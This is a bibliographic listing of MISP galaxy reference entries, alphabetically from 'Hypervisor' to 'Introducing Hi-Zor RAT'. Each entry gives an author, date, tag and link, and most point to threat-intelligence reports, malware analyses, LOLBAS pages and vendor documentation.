https://www.hybrid-analysis.com/sample/28553b3a9d2ad4361d33d29ac4bf771d008e0073cec01b5561c6348a608f8dd7?environmentId=300

Wikipedia Hypervisor

Wikipedia. (2016, May 23). Hypervisor. Retrieved June 11, 2016.

The tag is: misp-galaxy:references="Wikipedia Hypervisor"

Table 13952. Table References

Links

https://en.wikipedia.org/wiki/Hypervisor

FireEye ADFS

Bierstock, D., Baker, A. (2019, March 21). I am AD FS and So Can You. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="FireEye ADFS"

Table 13953. Table References

Links

https://www.troopers.de/troopers19/agenda/fpxwmn/

AWS EKS IAM Roles for Service Accounts

Amazon Web Services. (n.d.). IAM roles for service accounts. Retrieved July 14, 2023.

The tag is: misp-galaxy:references="AWS EKS IAM Roles for Service Accounts"

Table 13954. Table References

Links

https://docs.aws.amazon.com/eks/latest/userguide/iam-roles-for-service-accounts.html

Kaspersky IAmTheKing October 2020

Ivan Kwiatkowski, Pierre Delcher, Felix Aime. (2020, October 15). IAmTheKing and the SlothfulMedia malware family. Retrieved October 15, 2020.

The tag is: misp-galaxy:references="Kaspersky IAmTheKing October 2020"

Table 13955. Table References

Links

https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/

Amazon IAM Groups

Amazon. (n.d.). IAM user groups. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Amazon IAM Groups"

Table 13956. Table References

Links

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html

CrowdStrike IceApple May 2022

CrowdStrike. (2022, May). ICEAPPLE: A NOVEL INTERNET INFORMATION SERVICES (IIS) POST-EXPLOITATION FRAMEWORK. Retrieved June 27, 2022.

The tag is: misp-galaxy:references="CrowdStrike IceApple May 2022"

Table 13957. Table References

Links

https://www.crowdstrike.com/wp-content/uploads/2022/05/crowdstrike-iceapple-a-novel-internet-information-services-post-exploitation-framework.pdf

ICIT China’s Espionage Jul 2016

Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018.

The tag is: misp-galaxy:references="ICIT China’s Espionage Jul 2016"

Table 13958. Table References

Links

https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/

CISA ICS Advisory ICSA-10-272-01

CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). Retrieved December 7, 2020.

The tag is: misp-galaxy:references="CISA ICS Advisory ICSA-10-272-01"

Table 13959. Table References

Links

https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01

US-CERT Ukraine Feb 2016

US-CERT. (2016, February 25). ICS Alert (IR-ALERT-H-16-056-01) Cyber-Attack Against Ukrainian Critical Infrastructure. Retrieved June 10, 2020.

The tag is: misp-galaxy:references="US-CERT Ukraine Feb 2016"

Table 13960. Table References

Links

https://www.us-cert.gov/ics/alerts/IR-ALERT-H-16-056-01

Dragos Threat Report 2020

Dragos. (n.d.). ICS Cybersecurity Year in Review 2020. Retrieved February 25, 2021.

The tag is: misp-galaxy:references="Dragos Threat Report 2020"

Table 13961. Table References

Links

https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770

Cisco Advisory SNMP v3 Authentication Vulnerabilities

Cisco. (2008, June 10). Identifying and Mitigating Exploitation of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Cisco Advisory SNMP v3 Authentication Vulnerabilities"

Table 13962. Table References

Links

https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3

Resource and Data Forks

Flylib. (n.d.). Identifying Resource and Data Forks. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="Resource and Data Forks"

Table 13963. Table References

Links

https://flylib.com/books/en/4.395.1.192/1/

AWS Identity Federation

Amazon. (n.d.). Identity Federation in AWS. Retrieved March 13, 2020.

The tag is: misp-galaxy:references="AWS Identity Federation"

Table 13964. Table References

Links

https://aws.amazon.com/identity/federation/

Microsoft GetNCCChanges

Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December 4, 2017.

The tag is: misp-galaxy:references="Microsoft GetNCCChanges"

Table 13965. Table References

Links

https://msdn.microsoft.com/library/dd207691.aspx

Ie4uinit.exe - LOLBAS Project

LOLBAS. (2018, May 25). Ie4uinit.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Ie4uinit.exe - LOLBAS Project"

Table 13966. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/

Ieadvpack.dll - LOLBAS Project

LOLBAS. (2018, May 25). Ieadvpack.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Ieadvpack.dll - LOLBAS Project"

Table 13967. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/

iediagcmd.exe - LOLBAS Project

LOLBAS. (2022, March 29). iediagcmd.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="iediagcmd.exe - LOLBAS Project"

Table 13968. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Iediagcmd/

Wikipedia 802.1x

Wikipedia. (2018, March 30). IEEE 802.1X. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="Wikipedia 802.1x"

Table 13969. Table References

Links

https://en.wikipedia.org/wiki/IEEE_802.1X

Ieexec.exe - LOLBAS Project

LOLBAS. (2018, May 25). Ieexec.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Ieexec.exe - LOLBAS Project"

Table 13970. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ieexec/

Ieframe.dll - LOLBAS Project

LOLBAS. (2018, May 25). Ieframe.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Ieframe.dll - LOLBAS Project"

Table 13971. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Ieframe/

Wikipedia Ifconfig

Wikipedia. (2016, January 26). ifconfig. Retrieved April 17, 2016.

The tag is: misp-galaxy:references="Wikipedia Ifconfig"

Table 13972. Table References

Links

https://en.wikipedia.org/wiki/Ifconfig

EFF Manul Aug 2016

Galperin, E., et al. (2016, August). I Got a Letter From the Government the Other Day…. Retrieved April 25, 2018.

The tag is: misp-galaxy:references="EFF Manul Aug 2016"

Table 13973. Table References

Links

https://www.eff.org/files/2016/08/03/i-got-a-letter-from-the-government.pdf

IIS Backdoor 2011

Julien. (2011, February 2). IIS Backdoor. Retrieved June 3, 2021.

The tag is: misp-galaxy:references="IIS Backdoor 2011"

Table 13974. Table References

Links

https://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html

Microsoft IIS Modules Overview 2007

Microsoft. (2007, November 24). IIS Modules Overview. Retrieved June 17, 2021.

The tag is: misp-galaxy:references="Microsoft IIS Modules Overview 2007"

Table 13975. Table References

Links

https://docs.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview

Ilasm.exe - LOLBAS Project

LOLBAS. (2020, March 17). Ilasm.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Ilasm.exe - LOLBAS Project"

Table 13976. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ilasm/

anomali-rocke-tactics

Anomali Threat Research. (2019, October 15). Illicit Cryptomining Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="anomali-rocke-tactics"

Table 13977. Table References

Links

https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect

Microsoft Dev Blog IFEO Mar 2010

Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO). Retrieved December 18, 2017.

The tag is: misp-galaxy:references="Microsoft Dev Blog IFEO Mar 2010"

Table 13978. Table References

Links

https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/

IMEWDBLD.exe - LOLBAS Project

LOLBAS. (2020, March 5). IMEWDBLD.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="IMEWDBLD.exe - LOLBAS Project"

Table 13979. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/

Imminent Unit42 Dec2019

Unit 42. (2019, December 2). Imminent Monitor – a RAT Down Under. Retrieved May 5, 2020.

The tag is: misp-galaxy:references="Imminent Unit42 Dec2019"

Table 13980. Table References

Links

https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/

Core Security Impacket

Core Security. (n.d.). Impacket. Retrieved November 2, 2017.

The tag is: misp-galaxy:references="Core Security Impacket"

Table 13981. Table References

Links

https://www.coresecurity.com/core-labs/open-source-tools/impacket

Impacket Tools

SecureAuth. (n.d.). Retrieved January 15, 2019.

The tag is: misp-galaxy:references="Impacket Tools"

Table 13982. Table References

Links

https://www.secureauth.com/labs/open-source-tools/impacket

EK Impeding Malware Analysis

Song, C., et al. (2012, August 7). Impeding Automated Malware Analysis with Environment-sensitive Malware. Retrieved January 18, 2019.

The tag is: misp-galaxy:references="EK Impeding Malware Analysis"

Table 13983. Table References

Links

https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf

Microsoft Impersonation and EWS in Exchange

Microsoft. (2022, September 13). Impersonation and EWS in Exchange. Retrieved July 10, 2023.

The tag is: misp-galaxy:references="Microsoft Impersonation and EWS in Exchange"

Table 13984. Table References

Links

https://learn.microsoft.com/en-us/exchange/client-developer/exchange-web-services/impersonation-and-ews-in-exchange

Microsoft Implementing CPL

(n.d.). Implementing Control Panel Items. Retrieved January 18, 2018.

The tag is: misp-galaxy:references="Microsoft Implementing CPL"

Table 13985. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx

TechNet Least Privilege

Microsoft. (2016, April 16). Implementing Least-Privilege Administrative Models. Retrieved June 3, 2016.

The tag is: misp-galaxy:references="TechNet Least Privilege"

Table 13986. Table References

Links

https://technet.microsoft.com/en-us/library/dn487450.aspx

Dragos IT ICS Ransomware

Slowik, J. (2019, April 10). Implications of IT Ransomware for ICS Environments. Retrieved January 28, 2021.

The tag is: misp-galaxy:references="Dragos IT ICS Ransomware"

Table 13987. Table References

Links

https://www.dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/

Microsoft SolarWinds Steps

Lambert, J. (2020, December 13). Important steps for customers to protect themselves from recent nation-state cyberattacks. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="Microsoft SolarWinds Steps"

Table 13988. Table References

Links

https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/

White House Imposing Costs RU Gov April 2021

White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021.

The tag is: misp-galaxy:references="White House Imposing Costs RU Gov April 2021"

Table 13989. Table References

Links

https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/

Malicious Driver Reporting Center

Azure Edge and Platform Security Team & Microsoft 365 Defender Research Team. (2021, December 8). Improve kernel security with the new Microsoft Vulnerable and Malicious Driver Reporting Center. Retrieved April 6, 2022.

The tag is: misp-galaxy:references="Malicious Driver Reporting Center"

Table 13990. Table References

Links

https://www.microsoft.com/security/blog/2021/12/08/improve-kernel-security-with-the-new-microsoft-vulnerable-and-malicious-driver-reporting-center/

Unit 42 Inception November 2018

Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020.

The tag is: misp-galaxy:references="Unit 42 Inception November 2018"

Table 13991. Table References

Links

https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/

Symantec Inception Framework March 2018

Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020.

The tag is: misp-galaxy:references="Symantec Inception Framework March 2018"

Table 13992. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies

Expel AWS Attacker

Brian Bahtiarian, David Blanton, Britton Manahan and Kyle Pellett. (2022, April 5). Incident report: From CLI to console, chasing an attacker in AWS. Retrieved April 7, 2022.

The tag is: misp-galaxy:references="Expel AWS Attacker"

Table 13993. Table References

Links

https://expel.com/blog/incident-report-from-cli-to-console-chasing-an-attacker-in-aws/

Dark Reading Microsoft 365 Attacks 2021

Kelly Sheridan. (2021, August 5). Incident Responders Explore Microsoft 365 Attacks in the Wild. Retrieved March 17, 2023.

The tag is: misp-galaxy:references="Dark Reading Microsoft 365 Attacks 2021"

Table 13994. Table References

Links

https://www.darkreading.com/threat-intelligence/incident-responders-explore-microsoft-365-attacks-in-the-wild/d/d-id/1341591

U.S. CISA Increased Truebot Activity July 6 2023

Cybersecurity and Infrastructure Security Agency. (2023, July 6). Increased Truebot Activity Infects U.S. and Canada Based Networks. Retrieved July 6, 2023.

The tag is: misp-galaxy:references="U.S. CISA Increased Truebot Activity July 6 2023"

Table 13995. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-187a

Increasing Linux kernel integrity

Boelen, M. (2015, October 7). Increase kernel integrity with disabled Linux kernel modules loading. Retrieved June 4, 2020.

The tag is: misp-galaxy:references="Increasing Linux kernel integrity"

Table 13996. Table References

Links

https://linux-audit.com/increase-kernel-integrity-with-disabled-linux-kernel-modules-loading/

TechNet Scheduling Priority

Microsoft. (2013, May 8). Increase scheduling priority. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="TechNet Scheduling Priority"

Table 13997. Table References

Links

https://technet.microsoft.com/library/dn221960.aspx

Revil Independence Day

Loman, M. et al. (2021, July 4). Independence Day: REvil uses supply chain exploit to attack hundreds of businesses. Retrieved September 30, 2021.

The tag is: misp-galaxy:references="Revil Independence Day"

Table 13998. Table References

Links

https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/

Fortinet Agent Tesla June 2017

Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="Fortinet Agent Tesla June 2017"

Table 13999. Table References

Links

https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html

NCC Group Team9 June 2020

Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020.

The tag is: misp-galaxy:references="NCC Group Team9 June 2020"

Table 14000. Table References

Links

https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/

Trend Micro APT Attack Tools

Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools of the Trade. Retrieved December 2, 2015.

The tag is: misp-galaxy:references="Trend Micro APT Attack Tools"

Table 14001. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/

Symantec Suckfly May 2016

DiMaggio, J. (2016, May 17). Indian organizations targeted in Suckfly attacks. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="Symantec Suckfly May 2016"

Table 14002. Table References

Links

http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks

Joint CSA AvosLocker Mar 2022

FBI, FinCEN, Treasury. (2022, March 17). Indicators of Compromise Associated with AvosLocker Ransomware. Retrieved January 11, 2023.

The tag is: misp-galaxy:references="Joint CSA AvosLocker Mar 2022"

Table 14003. Table References

Links

https://www.ic3.gov/Media/News/2022/220318.pdf

FBI Flash Diavol January 2022

FBI. (2022, January 19). Indicators of Compromise Associated with Diavol. Retrieved March 9, 2022.

The tag is: misp-galaxy:references="FBI Flash Diavol January 2022"

Table 14004. Table References

Links

https://www.ic3.gov/Media/News/2022/220120.pdf

FBI Ragnar Locker 2020

FBI. (2020, November 19). Indicators of Compromise Associated with Ragnar Locker Ransomware. Retrieved April 1, 2021.

The tag is: misp-galaxy:references="FBI Ragnar Locker 2020"

Table 14005. Table References

Links

https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf

FBI FLASH APT39 September 2020

FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07. Retrieved December 10, 2020.

The tag is: misp-galaxy:references="FBI FLASH APT39 September 2020"

Table 14006. Table References

Links

https://www.iranwatch.org/sites/default/files/public-intelligence-alert.pdf

US District Court Indictment GRU Oct 2018

Brady, S. (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al. Retrieved October 1, 2020.

The tag is: misp-galaxy:references="US District Court Indictment GRU Oct 2018"

Table 14007. Table References

Links

https://www.justice.gov/opa/page/file/1098481/download

Checkpoint IndigoZebra July 2021

CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.

The tag is: misp-galaxy:references="Checkpoint IndigoZebra July 2021"

Table 14008. Table References

Links

https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/

HackerNews IndigoZebra July 2021

Lakshmanan, R. (2021, July 1). IndigoZebra APT Hacking Campaign Targets the Afghan Government. Retrieved September 24, 2021.

The tag is: misp-galaxy:references="HackerNews IndigoZebra July 2021"

Table 14009. Table References

Links

https://thehackernews.com/2021/07/indigozebra-apt-hacking-campaign.html

Check Point Meteor Aug 2021

Check Point Research Team. (2021, August 14). Indra - Hackers Behind Recent Attacks on Iran. Retrieved February 17, 2022.

The tag is: misp-galaxy:references="Check Point Meteor Aug 2021"

Table 14010. Table References

Links

https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/

Crowdstrike EvilCorp March 2021

Podlosky, A., Feeley, B. (2021, March 17). INDRIK SPIDER Supersedes WastedLocker with Hades Ransomware to Circumvent OFAC Sanctions. Retrieved September 15, 2021.

The tag is: misp-galaxy:references="Crowdstrike EvilCorp March 2021"

Table 14011. Table References

Links

https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/

Industroyer2 ESET April 2022

ESET. (2022, April 12). Industroyer2: Industroyer reloaded. Retrieved March 30, 2023.

The tag is: misp-galaxy:references="Industroyer2 ESET April 2022"

Table 14012. Table References

Links

https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/

Industroyer2 Blackhat ESET

Anton Cherepanov, Robert Lipovsky. (2022, August). Industroyer2: Sandworm’s Cyberwarfare Targets Ukraine’s Power Grid. Retrieved April 6, 2023.

The tag is: misp-galaxy:references="Industroyer2 Blackhat ESET"

Table 14013. Table References

Links

https://www.youtube.com/watch?v=xC9iM5wVedQ

Industroyer2 Mandiant April 2022

Daniel Kapellmann Zafra, Raymond Leong, Chris Sistrunk, Ken Proska, Corey Hildebrandt, Keith Lunden, Nathan Brubaker. (2022, April 25). INDUSTROYER.V2: Old Malware Learns New Tricks. Retrieved March 30, 2023.

The tag is: misp-galaxy:references="Industroyer2 Mandiant April 2022"

Table 14014. Table References

Links

https://www.mandiant.com/resources/blog/industroyer-v2-old-malware-new-tricks

Sixdub PowerPick Jan 2016

Warner, J. (2015, January 6). Inexorable PowerShell – A Red Teamer’s Tale of Overcoming Simple AppLocker Policies. Retrieved December 8, 2018.

The tag is: misp-galaxy:references="Sixdub PowerPick Jan 2016"

Table 14015. Table References

Links

https://web.archive.org/web/20160327101330/http://www.sixdub.net/?p=367

Infdefaultinstall.exe - LOLBAS Project

LOLBAS. (2018, May 25). Infdefaultinstall.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Infdefaultinstall.exe - LOLBAS Project"

Table 14016. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/

Trend Micro Exposed Docker APIs

Oliveira, A. (2019, May 30). Infected Containers Target Docker via Exposed APIs. Retrieved April 6, 2021.

The tag is: misp-galaxy:references="Trend Micro Exposed Docker APIs"

Table 14017. Table References

Links

https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html

SentinelOne MacMa Nov 2021

Stokes, P. (2021, November 15). Infect If Needed | A Deeper Dive Into Targeted Backdoor macOS.Macma. Retrieved June 30, 2022.

The tag is: misp-galaxy:references="SentinelOne MacMa Nov 2021"

Table 14018. Table References

Links

https://www.sentinelone.com/labs/infect-if-needed-a-deeper-dive-into-targeted-backdoor-macos-macma/

SANS Information Security Reading Room Securing SNMP Securing SNMP

Michael Stump. (2003). Information Security Reading Room Securing SNMP: A Look at Net-SNMP (SNMPv3). Retrieved October 19, 2020.

The tag is: misp-galaxy:references="SANS Information Security Reading Room Securing SNMP Securing SNMP"

Table 14019. Table References

Links

https://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051

Symantec Catchamas April 2018

Balanza, M. (2018, April 02). Infostealer.Catchamas. Retrieved July 10, 2018.

The tag is: misp-galaxy:references="Symantec Catchamas April 2018"

Table 14020. Table References

Links

https://www-west.symantec.com/content/symantec/english/en/security-center/writeup.html/2018-040209-1742-99

TrendMicro Ursnif File Dec 2014

Caragay, R. (2014, December 11). Info-Stealing File Infector Hits US, UK. Retrieved June 5, 2019.

The tag is: misp-galaxy:references="TrendMicro Ursnif File Dec 2014"

Table 14021. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/info-stealing-file-infector-hits-us-uk/

ThreatConnect Infrastructure Dec 2020

ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="ThreatConnect Infrastructure Dec 2020"

Table 14022. Table References

Links

https://threatconnect.com/blog/infrastructure-research-hunting/

Init Man Page

Kerrisk, M. (2021, March 22). INIT_MODULE(2). Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Init Man Page"

Table 14023. Table References

Links

https://man7.org/linux/man-pages/man2/init_module.2.html

Proofpoint RTF Injection

Raggi, M. (2021, December 1). Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors . Retrieved December 9, 2021.

The tag is: misp-galaxy:references="Proofpoint RTF Injection"

Table 14024. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread

HighTech Bridge Inline Hooking Sept 2011

Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="HighTech Bridge Inline Hooking Sept 2011"

Table 14025. Table References

Links

https://www.exploit-db.com/docs/17802.pdf

Stuart ELF Memory

Stuart. (2018, March 31). In-Memory-Only ELF Execution (Without tmpfs). Retrieved October 4, 2021.

The tag is: misp-galaxy:references="Stuart ELF Memory"

Table 14026. Table References

Links

https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html

ASERT InnaputRAT April 2018

ASERT Team. (2018, April 04). Innaput Actors Utilize Remote Access Trojan Since 2016, Presumably Targeting Victim Files. Retrieved July 9, 2018.

The tag is: misp-galaxy:references="ASERT InnaputRAT April 2018"

Table 14027. Table References

Links

https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/

Microsoft Holmium June 2020

Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020.

The tag is: misp-galaxy:references="Microsoft Holmium June 2020"

Table 14028. Table References

Links

https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/

RiskIQ British Airways September 2018

Klijnsma, Y. (2018, September 11). Inside the Magecart Breach of British Airways: How 22 Lines of Code Claimed 380,000 Victims. Retrieved September 9, 2020.

The tag is: misp-galaxy:references="RiskIQ British Airways September 2018"

Table 14029. Table References

Links

https://web.archive.org/web/20181231220607/https://riskiq.com/blog/labs/magecart-british-airways-breach/

Arbor AnnualDoSreport Jan 2018

Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor’s 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Arbor AnnualDoSreport Jan 2018"

Table 14030. Table References

Links

https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf

FireEye APT33 Sept 2017

O’Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="FireEye APT33 Sept 2017"

Table 14031. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

Installer Package Scripting Rich Trouton

Rich Trouton. (2019, August 9). Installer Package Scripting: Making your deployments easier, one ! at a time. Retrieved September 27, 2022.

The tag is: misp-galaxy:references="Installer Package Scripting Rich Trouton"

Table 14032. Table References

Links

https://cpb-us-e1.wpmucdn.com/sites.psu.edu/dist/4/24696/files/2019/07/psumac2019-345-Installer-Package-Scripting-Making-your-deployments-easier-one-at-a-time.pdf

Microsoft Install Password Filter n.d

Microsoft. (n.d.). Installing and Registering a Password Filter DLL. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Microsoft Install Password Filter n.d"

Table 14033. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms721766.aspx

Microsoft Unsigned Driver Apr 2017

Microsoft. (2017, April 20). Installing an Unsigned Driver during Development and Test. Retrieved April 22, 2021.

The tag is: misp-galaxy:references="Microsoft Unsigned Driver Apr 2017"

Table 14034. Table References

Links

https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test

LOLBAS Installutil

LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.

The tag is: misp-galaxy:references="LOLBAS Installutil"

Table 14035. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Installutil/

MSDN InstallUtil

Microsoft. (n.d.). Installutil.exe (Installer Tool). Retrieved July 1, 2016.

The tag is: misp-galaxy:references="MSDN InstallUtil"

Table 14036. Table References

Links

https://msdn.microsoft.com/en-us/library/50614e95.aspx

AWS Instance Identity Documents

Amazon. (n.d.). Instance identity documents. Retrieved April 2, 2021.

The tag is: misp-galaxy:references="AWS Instance Identity Documents"

Table 14037. Table References

Links

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html

AWS Instance Metadata API

AWS. (n.d.). Instance Metadata and User Data. Retrieved July 18, 2019.

The tag is: misp-galaxy:references="AWS Instance Metadata API"

Table 14038. Table References

Links

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html

RedLock Instance Metadata API 2018

Higashi, Michael. (2018, May 15). Instance Metadata API: A Modern Day Trojan Horse. Retrieved July 16, 2019.

The tag is: misp-galaxy:references="RedLock Instance Metadata API 2018"

Table 14039. Table References

Links

https://redlock.io/blog/instance-metadata-api-a-modern-day-trojan-horse

Nick Tyrer GitHub

Tyrer, N. (n.d.). Instructions. Retrieved August 10, 2020.

The tag is: misp-galaxy:references="Nick Tyrer GitHub"

Table 14040. Table References

Links

https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5

Intel Hardware-based Security Technologies

Intel. (2013). Intel Hardware-based Security Technologies for Intelligent Retail Devices. Retrieved May 19, 2020.

The tag is: misp-galaxy:references="Intel Hardware-based Security Technologies"

Table 14041. Table References

Links

https://www.intel.com/content/dam/www/public/us/en/documents/white-papers/security-technologies-4th-gen-core-retail-paper.pdf

Microsoft ISAPI Extension All Incoming 2017

Microsoft. (2017, June 16). Intercepting All Incoming IIS Requests. Retrieved June 3, 2021.

The tag is: misp-galaxy:references="Microsoft ISAPI Extension All Incoming 2017"

Table 14042. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525696(v=vs.90)

Clymb3r Function Hook Passwords Sept 2013

Bialek, J. (2013, September 15). Intercepting Password Changes With Function Hooking. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Clymb3r Function Hook Passwords Sept 2013"

Table 14043. Table References

Links

https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/

Microsoft ICMP

Microsoft. (n.d.). Internet Control Message Protocol (ICMP) Basics. Retrieved December 1, 2014.

The tag is: misp-galaxy:references="Microsoft ICMP"

Table 14044. Table References

Links

http://support.microsoft.com/KB/170292

Linux IPC

N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved March 11, 2022.

The tag is: misp-galaxy:references="Linux IPC"

Table 14045. Table References

Links

https://www.geeksforgeeks.org/inter-process-communication-ipc/

HackerNews - 3 SaaS App Cyber Attacks - April 2022

Hananel Livneh. (2022, April 7). Into the Breach: Breaking Down 3 SaaS App Cyber Attacks in 2022. Retrieved May 31, 2022.

The tag is: misp-galaxy:references="HackerNews - 3 SaaS App Cyber Attacks - April 2022"

Table 14046. Table References

Links

https://thehackernews.com/2022/04/into-breach-breaking-down-3-saas-app.html

RedCanary Mockingbird May 2020

Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020.

The tag is: misp-galaxy:references="RedCanary Mockingbird May 2020"

Table 14047. Table References

Links

https://redcanary.com/blog/blue-mockingbird-cryptominer/

Fidelis Hi-Zor

Fidelis Threat Research Team. (2016, January 27). Introducing Hi-Zor RAT. Retrieved March 24, 2016.

The tag is: misp-galaxy:references="Fidelis Hi-Zor"

